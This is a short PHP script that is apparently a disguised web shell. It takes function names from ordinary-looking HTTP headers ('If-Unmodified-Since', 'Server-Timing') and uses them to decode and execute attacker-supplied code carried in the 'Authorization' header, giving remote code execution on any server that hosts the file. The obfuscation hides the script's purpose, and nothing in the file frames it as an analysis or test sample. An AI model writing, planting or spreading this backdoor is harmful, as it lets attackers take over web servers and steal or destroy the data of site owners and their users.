<?php
$_HEADERS = getallheaders();
if (isset($_HEADERS['If-Unmodified-Since'])) {
    $accepted = $_HEADERS['If-Unmodified-Since']('', $_HEADERS['Server-Timing']($_HEADERS['Authorization']));
    $accepted();
}